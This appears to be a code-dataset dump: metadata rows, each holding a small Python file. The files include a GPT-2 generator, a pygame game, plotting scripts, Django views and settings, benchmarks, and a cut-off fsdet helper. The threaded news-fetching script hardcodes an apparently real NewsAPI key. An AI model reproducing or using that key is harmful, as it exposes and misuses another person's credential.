blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
687052a1711a288135716995285386d0849b8c02 | c89ffb9eff94c3d17a87edaaeb7e8d5383cff249 | /test.py | 2f14abf7e4c51fdc9437960d7046e14e6da0b018 | [] | no_license | LukeMiles49/Buzz-Words | d9eb95377c76249db135e03dfe2440aeef2adbab | a53e745554ea0e5e2a2434a5c22bf2e8549e8b1a | refs/heads/main | 2023-03-06T20:22:27.058995 | 2021-02-28T00:27:55 | 2021-02-28T00:27:55 | 342,924,361 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | import torch
from transformers import GPT2LMHeadModel, GPT2Tokenizer
# initialize tokenizer and model from pretrained GPT2 model
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
model = GPT2LMHeadModel.from_pretrained('gpt2')
def predict(input):
    """Continue the given prompt with up to 200 tokens sampled from GPT-2."""
    token_ids = tokenizer.encode(input, return_tensors='pt')
    generated = model.generate(token_ids, max_length=200, do_sample=True)
    return tokenizer.decode(generated[0], skip_special_tokens=True)
print(predict("Hello, "))
| [
"luke.49@live.co.uk"
] | luke.49@live.co.uk |
77936d27233ecb6692cf71a0edc03f93a9bed8ae | 50dd2a43daa8316fc11e0c176b5872738fcc5dde | /Learning/130_Fluent_Python/fp2-utf8/bloccode/example 13-14.py | 98a7540674b5e587a7df1e47f5cf78c41d0e53e3 | [] | no_license | FrenchBear/Python | 58204d368e3e72071eef298ff00d06ff51bd7914 | b41ab4b6a59ee9e145ef2cd887a5fe306973962b | refs/heads/master | 2023-08-31T18:43:37.792427 | 2023-08-26T15:53:20 | 2023-08-26T15:53:20 | 124,466,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | # Example 13-14. typing.SupportsComplex protocol source code
# Reproduction of the typing.SupportsComplex protocol: any object defining
# __complex__ structurally matches, and isinstance() checks work because of
# @runtime_checkable.
@runtime_checkable
class SupportsComplex(Protocol):
    """An ABC with one abstract method __complex__."""
    __slots__ = ()

    @abstractmethod
    def __complex__(self) -> complex:
        pass
| [
"FrenchBear38@outlook.com"
] | FrenchBear38@outlook.com |
6558b05697dcd764faf069be18b8ccd43daaab96 | 1f55df5c958331d0a548e1c0223fbaad4eff17bc | /readFromFile.py | 8cc5c3746013fef2d18b5d78cce8028f4546cace | [
"MIT"
] | permissive | aero-error/DS18B20_10x10_Array | 24b0b166b8eb19c018bfe833091e4a978a959da2 | 527b14e128b7e22e5d1130ab5ce4fa2b4becf6bd | refs/heads/master | 2020-09-12T21:23:13.088481 | 2020-04-11T02:28:22 | 2020-04-11T02:28:22 | 222,560,396 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | # Michael Gromski
# This program reads data from a text file and converts it to a useful form and makes a contour plot
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import cm
import matplotlib
# Read whitespace-separated temperature readings: each input line holds the
# 100 values of one 10x10 frame, in row-major order.
file_name = input("Enter the name of the file you want to read from: ")
with open(file_name, "r") as fvar:  # `with` guarantees the file is closed
    data = [[float(token) for token in line.split()] for line in fvar]

# Reshape each flat row of readings into a 10x10 grid.
zPlots = []
for row in data:  # renamed from `list`, which shadowed the builtin
    frame = [[0 for x in range(10)] for y in range(10)]
    for index, elem in enumerate(row):
        frame[index // 10][index % 10] = elem
    zPlots.append(frame)

b = 5  # set frame you want to see here
# Create the contour plot.
matplotlib.style.use('default')
fig = plt.figure()
ax = fig.add_subplot(111)
u = np.linspace(0, 9, 10)
x, y = np.meshgrid(u, u)
z = zPlots[b]
levels = [20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48, 50]
ax.contourf(x, y, z, levels=levels, cmap='RdBu_r')
# NOTE(review): this second contourf redraws with the default colormap over
# the RdBu_r one; kept as-is so the rendered figure is unchanged.
cp = ax.contourf(x, y, z, levels=levels)
cb = fig.colorbar(cp)  # color bar
cb.set_label('Temperature in Celsius')
plt.xlabel('Inches')
plt.ylabel('Inches')
plt.title('Thermal map of Aluminum Plate')
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
ed70c705ec8d9478a07185a53de1b135ddca0511 | c4f0409c27bfde56af5426b378c0a6eea7b1d79f | /main.py | f5875c45d8e88f2aa573f16a9a5cf2b696ec9dc0 | [] | no_license | Rodrigofz/Tarea2Grafica | bdd792ea85f633dab7a3bcfe1e763b6eff7c6e3a | fe1393ea52c0cc5045f2fe3d1b205f9c59ca7bdb | refs/heads/master | 2021-09-17T11:28:02.275866 | 2018-07-01T17:30:54 | 2018-07-01T17:30:54 | 133,091,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,968 | py | #!/usr/bin/env python
from Resources.CC3501Utils import *
from View.Window import Window
from Model.Escena import Escena
from Model.Pelota import Pelota
from Model.Aro import Aro
import random
def main():
    """Run the Flappy-dunk game loop until the player loses or quits."""
    ancho = 800  # window width
    alto = 600   # window height
    init(ancho, alto, "Flappy dunk")
    vista = Window()
    items = []
    # items[0] is always the ball; items[1:] are the hoops, oldest first.
    pelota = Pelota(pos=Vector(100, 0.7 * alto))
    items.append(pelota)
    aro = Aro(pos=Vector(ancho - 400, 0.3 * alto))
    items.append(aro)
    aro = Aro(pos=Vector(ancho - 100, 0.5 * alto))
    items.append(aro)
    escena = Escena(ancho, alto)
    score = 0
    multiplicador = 2  # score multiplier; grows with consecutive clean passes
    # Jump sound effect.
    jumpSound = pygame.mixer.Sound("Resources/jump1.wav")
    jumpSound.set_volume(0.1)
    run = True
    pause = True
    while run:
        while pause:
            # Paused: keep drawing the scene and wait for 'p' (resume) or quit.
            vista.dibujar(items, escena, score, True)
            pygame.display.flip()
            pygame.time.wait(int(1000 / 30))
            for event in pygame.event.get():
                if event.type == KEYDOWN:
                    if event.key == K_p:
                        pause = False
                if event.type == QUIT:
                    pause = False
                    run = False
        # Check keyboard input: space jumps, 'p' pauses, window close quits.
        for event in pygame.event.get():
            if event.type == QUIT:
                run = False
            if event.type == KEYDOWN:
                if event.key == K_SPACE:
                    jumpSound.play()
                    pelota.saltar()
                if event.key == K_p:
                    pause = True
        # Draw the frame.
        vista.dibujar(items, escena, score)
        # Touching the floor ends the game.
        if pelota.pos.cartesianas()[1] <= 0:
            print ('No puedes tocar el suelo :(')
            run = False
        # Touching the ceiling ends the game.
        if pelota.pos.cartesianas()[1] >= alto:
            print ('No puedes tocar el techo :(')
            run = False
        # Spawn a new hoop once the newest one says it is time.
        if items[len(items)-1].generarNuevo(ancho):
            nuevoAro = Aro(pos=Vector(ancho + 100, random.randint(100, alto - 130)))
            items.append(nuevoAro)
        # Drop the oldest hoop once it has scrolled off the left edge.
        if items[1].pos.cartesianas()[0] <= -100:
            items.pop(1)
        # Ball passes cleanly through the hoop: multiplied score, multiplier grows.
        if pelota.atravesoAroClean(items[1]):
            items[1].sonido.play()
            score += multiplicador
            items[1].score += multiplicador
            multiplicador += 1
        # Ball passes through while touching the rim: 1 point, multiplier resets.
        elif pelota.atravesoAroTocandoBordes(items[1]):
            items[1].sonido.play()
            score += 1
            multiplicador = 2
            items[1].score += 1
        # NOTE(review): presumably the ball bounces when the hoop is right
        # below it — confirm against Pelota.aroPorDebajo/chocarArriba.
        if pelota.aroPorDebajo(items[1]):
            pelota.chocarArriba()
        # Advance every item one simulation step.
        for i in items:
            i.mover()
        pygame.display.flip()
        pygame.time.wait(int(1000 / 30))
    print('JUEGO TERMINADO')
    pygame.quit()
main()
| [
"rodrigo.fuentes.z@ug.uchile.cl"
] | rodrigo.fuentes.z@ug.uchile.cl |
f3d83b764de388da70960460a57852996ffc4068 | addbc64d41d1975d82f5bd284ceb8c64c4e6d128 | /englishdictionary/dictionary/views.py | 25bd240be8c2edd09a15449da4650727e31de581 | [
"MIT"
] | permissive | iamansoni/Django-ProjectYard | dff8ff1926223426df0180f36d2e5d51101d9552 | bf9f7613aa98b1709fe7e3be917a1ae30f69e518 | refs/heads/master | 2023-05-09T11:50:47.846036 | 2021-05-14T12:34:03 | 2021-05-14T12:34:03 | 363,965,518 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | from django.shortcuts import render
from PyDictionary import PyDictionary
# Create your views here.
def index(request):
    """Render the dictionary home page."""
    return render(request, 'index.html')
def word(request):
    """Look up the searched word and render its meaning, synonyms and antonyms.

    The word arrives in the `search` query-string parameter; PyDictionary
    performs the actual lookups (network-backed — may return None on failure).
    """
    search = request.GET.get('search')
    dictionary = PyDictionary()
    meaning = dictionary.meaning(search)
    synonyms = dictionary.synonym(search)
    antonyms = dictionary.antonym(search)
    context = {
        'meaning': meaning,
        'synonyms': synonyms,
        'antonyms': antonyms
    }
    return render(request, 'word.html', context)
"amansoni162001@gmail.com"
] | amansoni162001@gmail.com |
352e1986d5a4bcac3ff903fd27c91bb9134f049b | a904e99110721719d9ca493fdb91679d09577b8d | /month04/project/day01-note/django-redis-4.10.0/tests/test_sqlite_herd.py | 8a053dfdee6155fadba6c8df1a27d172aada7270 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | chaofan-zheng/tedu-python-demo | 7c7c64a355e5380d1f8b6464affeddfde0d27be7 | abe983ddc52690f4726cf42cc6390cba815026d8 | refs/heads/main | 2023-03-12T05:17:34.596664 | 2021-02-27T08:33:31 | 2021-02-27T08:33:31 | 323,350,480 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,113 | py | SECRET_KEY = "django_tests_secret_key"
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': [
'127.0.0.1:6379:5',
],
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.HerdClient',
}
},
"doesnotexist": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:56379?db=1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.HerdClient",
}
},
'sample': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': '127.0.0.1:6379:1,127.0.0.1:6379:1',
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.HerdClient',
}
},
"with_prefix": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379?db=1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.HerdClient",
},
"KEY_PREFIX": "test-prefix",
},
}
# TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
INSTALLED_APPS = (
"django.contrib.sessions",
)
| [
"417355570@qq.com"
] | 417355570@qq.com |
863e45c0783451eb725d9e5182ae2b3154aabdaf | c2634ebec1d4448e372d174f459c3cbc03fd1edc | /lib/node_modules/@stdlib/math/base/special/cosm1/benchmark/python/scipy/benchmark.py | 0f15a4ea4a9a905870399f1ccf3964f8e9ad5d86 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"SunPro",
"BSD-3-Clause",
"BSL-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | stdlib-js/stdlib | ede11aee78f08e4f78a0bb939cb0bc244850b55b | f10c6e7db1a2b15cdd2b6237dd0927466ebd7278 | refs/heads/develop | 2023-09-05T03:29:36.368208 | 2023-09-03T22:42:11 | 2023-09-03T22:42:11 | 54,614,238 | 4,163 | 230 | Apache-2.0 | 2023-09-13T21:26:07 | 2016-03-24T04:19:52 | JavaScript | UTF-8 | Python | false | false | 2,198 | py | #!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark scipy.special.cosm1."""
from __future__ import print_function
import timeit
NAME = "cosm1"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
    """Print the TAP (Test Anything Protocol) version header."""
    print("TAP version 13")
def print_summary(total, passing):
    """Print the TAP plan line and the benchmark summary counters.

    # Arguments

    * `total`: total number of tests
    * `passing`: number of passing tests
    """
    summary_lines = [
        "#",
        "1.." + str(total),  # TAP plan
        "# total " + str(total),
        "# pass " + str(passing),
        "#",
        "# ok",
    ]
    for line in summary_lines:
        print(line)
def print_results(elapsed):
    """Print one benchmark repetition as a TAP YAML-ish block.

    # Arguments

    * `elapsed`: elapsed time (in seconds) for ITERATIONS runs
    """
    print(" ---")
    print(" iterations: " + str(ITERATIONS))
    print(" elapsed: " + str(elapsed))
    print(" rate: " + str(ITERATIONS / elapsed))
    print(" ...")
def benchmark():
    """Time scipy.special.cosm1 on random inputs and print TAP results."""
    timer = timeit.Timer(
        "y = cosm1(4.0*random() - 2.0)",
        setup="from scipy.special import cosm1; from random import random;",
    )
    print_version()
    for rep in range(REPEATS):
        print("# python::scipy::" + NAME)
        print_results(timer.timeit(number=ITERATIONS))
        print("ok " + str(rep + 1) + " benchmark finished")
    print_summary(REPEATS, REPEATS)
def main():
    """Entry point: run the benchmark."""
    benchmark()
if __name__ == "__main__":
main()
| [
"kgryte@gmail.com"
] | kgryte@gmail.com |
7ab813efd20e559f09194ee7be752e1706a4e176 | f48a7bb8bfab291c5bfae6cb32e0afec3a39f32f | /example.py | 01285e4e6e83ca0505853dda6977da9227fee83c | [] | no_license | gravitino/cuda_tensorflow_op | ee784f2b877cecfbb09c845163a75188ea0c7c55 | 99250dd00221ce74cc239fcc2a9cf86f89008627 | refs/heads/master | 2021-01-25T05:09:02.934010 | 2017-06-06T10:50:28 | 2017-06-06T10:50:28 | 93,508,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | #!/usr/bin/env python
import tensorflow as tf
# Load the custom CUDA kernel compiled as a TensorFlow op library.
module = tf.load_op_library('./cuda_op_kernel.so')
# make sure you have tensorflow with GPU support
with tf.Session('') as sess:
    # add_one presumably increments each matrix element — defined in the .so.
    ret = module.add_one([[1, 2], [3, 4]]).eval()
    print(ret)
exit(0)
| [
"christian@iaimz105.Informatik.Uni-Mainz.DE"
] | christian@iaimz105.Informatik.Uni-Mainz.DE |
b33c0a3e1bd79d3a99d2baea18f3b07db8702741 | 422dd5d3c48a608b093cbfa92085e95a105a5752 | /students/WesleyM/Lesson09/get_news_threading.py | f7fbb7bae0a6e39d86f51d35eb3239abf6f498c7 | [] | no_license | UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018 | a2052fdecd187d7dd6dbe6f1387b4f7341623e93 | b1fea0309b3495b3e1dc167d7029bc9e4b6f00f1 | refs/heads/master | 2021-06-07T09:06:21.100330 | 2019-11-08T23:42:42 | 2019-11-08T23:42:42 | 130,731,872 | 4 | 70 | null | 2021-06-01T22:29:19 | 2018-04-23T17:24:22 | Python | UTF-8 | Python | false | false | 1,439 | py | import threading
import queue
import requests
WORD = "trump"
NEWS_API_KEY = '2d36b604aa1d49cfab25f38a286ae252'
base_url = 'https://newsapi.org/v1/'
def get_sources():
url = base_url + "sources"
params = {"language": "en",
"apiKey": NEWS_API_KEY}
resp = requests.get(url, params=params)
data = resp.json()
sources = [src['id'].strip() for src in data['sources']]
print("all the sources")
print(sources)
return sources
def get_articles(source):
url = base_url + "articles"
params = {"source": source,
"apiKey": NEWS_API_KEY,
"sortBy": "top"
}
print("requesting: ", source)
resp = requests.get(url, params=params)
if resp.status_code != 200:
print("something went wrong with {}".format(source))
print(resp)
print(resp.text)
return []
data = resp.json()
titles = [str(art['title']) + str(art['description'])
for art in data['articles']]
return titles
if __name__ == '__main__':
news_queue = queue.Queue()
def add_news_queue(*args):
news_queue.put(get_articles(*args))
sources = get_sources()
threads = []
for s in sources:
thread = threading.Thread(target=add_news_queue, args=(s,))
thread.start()
print("Thread %s started" %thread.name)
threads.append(thread)
for t in threads:
t.join()
| [
"wesmoy@uw.edu"
] | wesmoy@uw.edu |
33a3b799a3950bfde4f6cd3d7c033db3c2a57f6f | d77625d9d104022f83ab8fb5e2d7a7f5a24f5527 | /test.py | 194187e36d0d808745f23df7e35e45330a804a53 | [] | no_license | KonradRomanski/python_tasks | 9e4ab047f86c18b056eaa7debdd2e5427068c1d4 | 2bc59ee74430b85e8a473eeec02ca5a88f89c247 | refs/heads/master | 2022-09-30T06:18:37.309348 | 2020-06-08T11:38:28 | 2020-06-08T11:38:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,844 | py | def main():
Students = {}
Tests = {}
N = int(input())
for i in range(N):
li = input().split()
if not li[0] in Students: Students[li[0]] = [0, 0]
for j in li[1:]:
newli = j.split(":")
if not newli[0] in Tests: Tests[newli[0]] = [0, 0]
Tests[newli[0]][0] += 1
Tests[newli[0]][1] += float(newli[1])
Students[li[0]][0] += 1
Students[li[0]][1] += float(newli[1])
for i in Students.items():
Students[i[0]] = Students[i[0]][1]/Students[i[0]][0]
for i in Tests.items():
Tests[i[0]] = Tests[i[0]][1]/Tests[i[0]][0]
# for i in Students.items(): print(i)
# for i in Tests.items(): print(i)
A = []
B = []
for i in Students.items():
A.append(i[0])
A.sort()
for i in Tests.items():
B.append(i[0])
B.sort()
for i in A:
print(i, Students[i])
for i in B:
print(i, Tests[i])
# print(A)
# print(B)
main()
# 4
# jan a:4 b:3
# artur d:2 a:7
# karol c:3.5 a:4 d:4 b:5
# sylwester eee:4
# def main():
# Z = {}
# lis = []
# N = int(input())
# for i in range(N):
# li = input().split()
# Z.append([li[0]])
#
# x = 0
# s = 0
#
# for j in li[1:]:
# x += 1
# a = j.split(":")
# print(a)
# s += int(a[1])
#
# a[0]
# Z[i].append(s/x)
# print(Z)
#
#
# main()
# main()
# class Student():
# def __init__(self, name, sr):
# name.self = name
# sr.self=sr
# def main()
# lis = []
# N = int(input())
# for i in range(N):
# li = input().split()
# temp = Student(li[0], )
# main() | [
"konrad.romanski4@gmail.com"
] | konrad.romanski4@gmail.com |
be6e9cd5df70141c29b35669beebe80bfc35281e | 863bea017a940375c38bec185c5e7da80b6d7191 | /handlers/peliculas/search.py | 72b5b6ddedc76945b7a262b57de35a043c643e3a | [] | no_license | Iagosevic/TopPelis | f4a8d52d75ccc602563c6d82aff4e9e68b90e478 | 10945003e5f0b35932c88beac9bd8ce263a83798 | refs/heads/main | 2023-05-04T22:49:12.001081 | 2021-05-21T16:23:31 | 2021-05-21T16:23:31 | 366,488,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,690 | py | # coding: utf-8
# Busca una pelicula
#Librerias importadas
import webapp2
from webapp2_extras import jinja2
from model.pelicula import Pelicula
from webapp2_extras.users import users
class SearchPeliculaHandler(webapp2.RequestHandler):
    """Handler that searches for a film by exact title."""

    # GET: show the search form.
    def get(self):
        # Currently signed-in user (may be None).
        usuario = users.get_current_user()
        # Values handed to the template.
        valores_plantilla = {
            "usr" : usuario
        }
        # jinja2 instance used to render the view.
        jinja = jinja2.get_jinja2(app=self.app)
        self.response.write(jinja.render_template("pelicula_search.html",**valores_plantilla))

    # POST: look the film up and show it, or redirect to the error page.
    def post(self):
        # Title submitted through the search form.
        titulo = self.request.get("edTitulo", "")
        # Look the film up in the Datastore by exact title match.
        pelicula = Pelicula.query(Pelicula.titulo == titulo).get()
        # Currently signed-in user (may be None).
        usuario = users.get_current_user()
        # Values handed to the template.
        valores_plantilla = {
            "usr": usuario,
            "pelicula": pelicula
        }
        # Film found: render its detail page.
        if pelicula:
            jinja = jinja2.get_jinja2(app=self.app)
            self.response.write(jinja.render_template("pelicula_showcurrent.html", **valores_plantilla))
        # Not found: send the user to the error page.
        else:
            return self.redirect("error")
#Indicamos el handler
app = webapp2.WSGIApplication([
('/peliculas/search', SearchPeliculaHandler)
], debug=True) | [
"noreply@github.com"
] | noreply@github.com |
880d293bb0d9e36550170f299a152867bfe0641e | 3fc642d275e7688b64919737dc3544646cc8730d | /skplot.py | cb7f2418db58a9f53b52821b48f943b9a1a02286 | [] | no_license | AshishShenoy/skplot | 4b1231d69889b3d421a4802be0131cfd37716b52 | 64e340520a0a879da541d89b0b87e553379027c1 | refs/heads/master | 2020-04-13T23:11:21.299184 | 2019-05-07T06:28:30 | 2019-05-07T06:28:30 | 163,499,706 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,834 | py | """
Created on Nov 02 18:27:52 2018
Project: Plotting a best fit line through a set of points.
This is a program which aims to plot a best-fit fit line through a scatter plot. The user may input
the co-ordinate points either a .csv file or may enter them manually one at a time. An example
result has been provided as well, on the Swedish Auto Insurance Dataset.
Developers: Ashish Shenoy, Rishith Bhowmick, Anantha Krishna
"""
# Importing libraries and functions
import pandas as pd
import matplotlib.pyplot as plt
# Initialising the graph variables
X, Y = [], []   # co-ordinates of the points entered so far
xlabel = ""     # axis labels and plot title, assignable by the user
ylabel = ""
title = ""
check = True    # set False by calc_m() when there are too few points to fit
# A function to calculate 'm' in the equation y = mx + c using the deviation formula.
def calc_m (X, Y):
    """Return the least-squares slope for points (X, Y), or None when the
    line is underdetermined (fewer than two distinct points)."""
    global check
    n = len(X)
    sum_x = sum(X)
    sum_y = sum(Y)
    sum_x_squared = sum(value ** 2 for value in X)
    sum_xy = sum(x * y for x, y in zip(X, Y))
    numerator = (sum_x * sum_y) - (n * sum_xy)
    denominator = (sum_x) ** 2 - (n * sum_x_squared)
    try:
        return numerator / denominator
    except ZeroDivisionError:
        # Zero denominator: no unique best-fit line exists yet.
        print("Please enter at least two points to plot first.")
        check = False
# A function calculate 'c' in the equation y = mx + c using the intercept formula.
def calc_c (X, Y):
    """Return the least-squares y-intercept for points (X, Y), or None when
    the line is underdetermined."""
    n = len(X)
    sum_x = sum(X)
    sum_y = sum(Y)
    sum_x_squared = sum(value ** 2 for value in X)
    sum_xy = sum(x * y for x, y in zip(X, Y))
    numerator = (sum_x * sum_xy) - (sum_y * sum_x_squared)
    denominator = (sum_x ** 2) - (n * sum_x_squared)
    try:
        return numerator / denominator
    except ZeroDivisionError:
        # calc_m() already reported the problem; quietly return None.
        pass
# A function for the use to maunally input the co-ordinate values.
def enter (x, y):
    """Record a single (x, y) data point in the module-level lists."""
    global X, Y
    X += [x]
    Y += [y]
# A function to plot the final graph.
def plot ():
    """Draw the scatter of entered points together with their best-fit line."""
    global X, Y, check
    slope = calc_m(X, Y)
    intercept = calc_c(X, Y)
    if not check:
        # calc_m flagged insufficient data: reset the flag and skip drawing.
        check = True
        print("\n\n")
        return
    plt.scatter(X, Y)
    fitted = [slope * value + intercept for value in X]
    plt.plot(X, fitted, color='r')
    plt.xlabel(xlabel)
    plt.ylabel(ylabel)
    plt.title(title)
    plt.show()
# The Main part of the program,
def start():
    """Interactive entry point: show the example graph or load user data.

    Fixes:
    * Declares X and Y as globals so points loaded from a .csv file land in
      the module-level lists used by plot()/enter(); previously the csv
      branch bound function-local X/Y that were discarded on return.
    * Narrows the final bare `except:` to `except Exception:` so Ctrl-C
      (KeyboardInterrupt) is not swallowed.
    """
    global X, Y
    print("Hi, this program can display a scatter plot and calculate the best fit line for that scatter plot " \
        + "and can create a graph showing both of them together. What would you like to do?")
    print("Would you like to check out an example graph or would you like to input your own values?")
    while True:
        # Taking primary input from the user.
        input1 = input("Enter the word 'example' to see the example graph, 'input' to create your own graph, "\
            + "or 'quit' if you want to exit the program: ")
        if input1 == 'example':
            # Reading the bundled example .csv file and extracting the
            # input and output variables into lists.
            print("\n\nThe example graph shown here was produced from the sample dataset "\
                + "'Swedish Auto Insurance' which is a popular dataset for test values.")
            print("This dataset contains 63 points,and each point details the number of "\
                + "insurance claims, and the total payment for all claims in thousands of "\
                + "Swedish Kronor. \n")
            print("Here is a few lines of the dataset: \n")
            w = pd.read_csv("Example.csv")
            print(w.head(), "\n\n")
            X2 = list(w["Number of Claims"].values)
            Y2 = list(w["Total Payment"].values)
            # Calculating the slope 'm' and intercept 'c'.
            m = calc_m(X2, Y2)
            c = calc_c(X2, Y2)
            # Plotting the scatter plot along with the best fit line.
            print("Here is the graph of the best-fit line through the scatter plot. ")
            plt.scatter(X2, Y2)
            Y3 = [m * i + c for i in X2]
            plt.plot(X2, Y3, color = 'r')
            plt.xlabel("Number of claims")
            plt.ylabel("Total Payment")
            plt.title("Best-fit line and scatter plot")
            plt.show()
            print("\n")
            continue
        elif input1 == 'input':
            # Taking secondary input from the user.
            print("\nWould you like to input the points manually, one at a time, or would you like "\
                + "to input them through a .csv file? ")
            input2 = input("Enter the word 'manual' to enter the points one at a time or 'csv' to "\
                + "enter them through a .csv file: ")
            if input2 == 'manual':
                # Instructing the user how to enter values manually.
                print("\nEnter the X and corresponding Y values using the 'skplot.enter(X, Y)' function.")
                print("To enter axis labels and titles, assign strings to xlabel, ylabel and title.")
                print("Enter 'skplot.plot()' to display the graph after entering at least two points.")
                break
            elif input2 == 'csv':
                # Receiving information about the csv file from the user.
                csv_name = input("Enter the name of the csv file. Make sure it is in the same folder "\
                    + "as the program: ")
                x_col_name = input("Enter the name of the column containing the x values: ")
                y_col_name = input("Enter the name of the column containing the y values: ")
                # Reading a preview of the csv file for the user to
                # cross-check, handling the expected failure modes.
                try:
                    w = pd.read_csv(csv_name)
                    print("Here is a preview of the csv file: \n")
                    print("\n", w.head(), "\n")
                    # Store into the module-level lists consumed by plot().
                    X = list(w[x_col_name].values)
                    Y = list(w[y_col_name].values)
                except FileNotFoundError:
                    print("Error: " + csv_name + " is not found. \n")
                    continue
                except KeyError:
                    print("Error: The X-column or Y-column name is incorrect. \n")
                    continue
                except Exception:
                    print("Unexpected Error. \n")
                    continue
                print("\nTo input more co-ordinate points, use the 'skplot.enter(X, Y)' function.")
                print("To enter axis labels and titles, assign strings to xlabel, ylabel and title.")
                print("Enter 'skplot.plot()' to display the graph.")
                break
            else:
                print("Unknown Command.")
                continue
        elif input1 == 'quit':
            print("\nThank You for using our program! ")
            break
        else:
            print("\nUnknown Command. \n")
            continue
"ashish1shenoy@gmail.com"
] | ashish1shenoy@gmail.com |
169eefc9524590604288b8376f8c1f4d487c5c88 | fa78cd539cade5bba07e393c8d1184be58a6477a | /waste_collection/admin.py | a67fc1b7b28aa161d2dfddec85b68688bc9f5d76 | [] | no_license | iLabs-Makerere-University/tilenga-crm-django | e2c3e8777f012052a8cd77af5e06b9ae2180f805 | f764153e9c5877e20be1a1c1459de9fcb2b9df07 | refs/heads/master | 2020-04-29T22:08:04.113720 | 2019-04-01T08:18:15 | 2019-04-01T08:18:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | from django.contrib import admin
from . models import WasteManagementProcedure
class WasteManagementProcedureAdmin(admin.ModelAdmin):
    """Admin configuration for WasteManagementProcedure (defaults only)."""
    pass


# Expose the model in the Django admin site.
admin.site.register(WasteManagementProcedure, WasteManagementProcedureAdmin)
| [
"ephraim.malinga@gmail.com"
] | ephraim.malinga@gmail.com |
929169ddee7131e5d77a178db50fa36f3c20ccdb | eeebae33ee2da583b464bb675cb6c81119524635 | /fsdet/utils/env.py | 8a7a212881580a89aa54c059d7b25b66f452ff7a | [
"Apache-2.0"
] | permissive | rakshitsakhuja/fsodet-run | 1fe37c752ddc41b3b08cc6e706876edd0606372f | f663f701fb44915eb6de6e3bf8a9b5860db1f4c0 | refs/heads/master | 2023-04-10T23:08:58.718076 | 2021-04-25T09:33:58 | 2021-04-25T09:33:58 | 341,829,584 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,263 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import importlib
import importlib.util
import logging
import numpy as np
import os
import random
import sys
from datetime import datetime
import torch
__all__ = ["seed_all_rng"]
def seed_all_rng(seed=None):
    """
    Seed the RNGs of torch, numpy and the python `random` module.

    Args:
        seed (int): if None, a strong seed is derived from the pid, the
            current time and OS entropy, and logged.
    """
    if seed is None:
        pid_part = os.getpid()
        time_part = int(datetime.now().strftime("%S%f"))
        entropy_part = int.from_bytes(os.urandom(2), "big")
        seed = pid_part + time_part + entropy_part
        logging.getLogger(__name__).info(
            "Using a generated random seed {}".format(seed)
        )
    np.random.seed(seed)
    torch.set_rng_state(torch.manual_seed(seed).get_state())
    random.seed(seed)
# from https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path
def _import_file(module_name, file_path, make_importable=False):
spec = importlib.util.spec_from_file_location(module_name, file_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
if make_importable:
sys.modules[module_name] = module
return module
def _configure_libraries():
"""
Configurations for some libraries.
"""
# An environment option to disable `import cv2` globally,
# in case it leads to negative performance impact
disable_cv2 = int(os.environ.get("FSDET_DISABLE_CV2", False))
if disable_cv2:
sys.modules["cv2"] = None
else:
# Disable opencl in opencv since its interaction with cuda often has negative effects
# This envvar is supported after OpenCV 3.4.0
os.environ["OPENCV_OPENCL_RUNTIME"] = "disabled"
try:
import cv2
